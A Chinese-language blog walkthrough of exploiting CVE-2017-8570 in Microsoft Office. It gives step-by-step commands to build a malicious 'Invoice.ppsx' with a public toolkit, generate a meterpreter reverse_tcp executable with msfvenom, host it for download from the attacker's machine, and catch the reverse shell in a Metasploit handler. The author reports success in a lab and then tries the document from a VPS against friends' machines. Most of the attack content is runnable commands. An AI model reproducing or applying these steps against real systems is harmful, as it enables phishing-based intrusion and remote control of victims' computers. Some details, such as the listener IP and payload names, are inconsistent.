CVE-2017-8570实验与实战测试

0x00 前言

PPSX格式介绍:微软公司OFFICE 2007系列软件中PowerPoint的一种文件格式,放映视图。利用背景:广泛运用于APT攻击。由于微软office套件在世界范围内拥有大料的用户,掌握了office套件漏洞从而进行**级别的鱼叉攻击,目标手到擒来。不过该漏洞早在17年就被微软修复了,可见及时更新补丁是非常之重要的。2017 年10月,微软就正式停止了对 Office 2007的技术支持。这本是软件生命周期中不可避免的事情,但对于使用Office 软件的用户来说,除非升级到更新的版本,否则将面临被黑客攻击的风险。然而,事实上目前仍有大量的用户选择不升级,而是继续使用老版本的Office软件。

CVE-2017-8570简介:远程代码执行漏洞、逻辑漏洞,与常规内存破坏型漏洞不同。CVE-2017-8570漏洞是利用复合Moniker绕过了CVE-2017-0199的补丁针对Script Moniker和URL Moniker相关classid的拦截。具体漏洞细节….

0x01 实验环境介绍

攻击环境:Kali 2018、VPS(Centos搭载MSF)

实验环境:内网主机win7 office2016未更新版本

实验Kali :192.168.47.133

目标靶机:192.168.47.128

影响范围:
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)

0x02 验证过程

漏洞利用脚本下载:git clone

git clone https://github.com/tezukanice/Office8570.git

进入下载目录,下载文件包含:

cve-2017-8570_toolkit.py README.md template.ppsx

这边网上反映了一个问题就是执行生成ppsx语句报错问题,先填一下坑,文件少了一个为template目录,于是得先在当前目录下mkdir一个template,将template.ppsx移动到template目录下;

mkdir template

mv template.ppsx template

执行生成恶意的ppsx文件:

命令:

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.47.133/log.doc

解释一下Invoice.ppsx为恶意文件名,可自定义的,-u 参数为攻击机本地IP,这时候就该想一下了:“为啥我没开启http服务啊?怎么指向了本地http服务了?”,其实仔细的分析cve-2017-9570_toolkit.py文件,有个生成监听本地80服务的。所以,在测试的时候我们不能单单只是照葫芦画瓢,还要参照一下大佬们写的python文件的内容,这里就不展开详述了。

生成恶意文件成功时:

生成反弹shell

对于kali攻击机,监听本地7777端口,使用msfvenom生成反射shell木马

命令:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.47.133 LPORT=7777 -f exe > /root/桌面/hack/cve2017-8570/shell.exe

后面跟着是路径,这个要注意点。还有就是根据目标的系统x86命令是:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.47.133 LPORT=7777 -f exe > /root/桌面/hack/cve2017-8570/shell.exe

监听端口

监听攻击机本地80端口,指向刚生成的shell.exe,使得漏洞触发时达到下载效果。

命令:

python cve-2017-8570_toolkit.py -M exp -e http://192.168.47.133/shell.exe -l /root/桌面/hack/Office8570/shell.exe

配置MSF监听

打开msf:

use exploit/multi/handler

set LHOST 192.168.1.212

set LPORT 7777

set PAYLOAD windows/x64/meterpreter/reverse_tcp

windows/meterpterter/reserver_tcp

exploit

如果是x86的系统,就将set payload 路径去掉x64即可。这里,可能有个想法,既要监听80端口,又得监听7777端口。分析一下,80端口为http服务,当靶机打开ppsx时,访问攻击机的80端口即下载shell.exe,然后shell.exe主动连接攻击机的7777端口,从而打开一个meterpreter。

在测试机上打开任务管理器发现了shell.exe进程,打开文件所在目录:

C:\Users\hkdoor\AppData\Local\Temp\WeChat Files\e9e9b841d4c941d9ec846ce3ddb321e.png

攻击利用成功,得到meterpreteer,进而控制目标靶机。

至此,CVE-2017-8570本地利用结束。

0x03 实战测试

这里我在我的VPS进行测试,VPS环境为Centos 安装了MSF,python等环境。然后这里有个小插曲,就是我的python环境为2.6.6,在生成攻击文档时报错,对python进行了一番升级,升级到2.7版本,才解决该问题。

  1. VPS上Python版本问题
  2. 使用了lnmp绑定了80端口,端口被占用等问题

一番正常的操作后,我将生成的文档放入本地虚拟机进行测试,成功的连接到我的VPS上

当将文档发给其他小旁友进行测试时,却没有那么的顺利了,由于漏洞公开与17年,一些该升级的升级,该打补丁的都打上了。漏洞并没有触发。

好了 结束。

发表评论

电子邮件地址不会被公开。 必填项已用*标注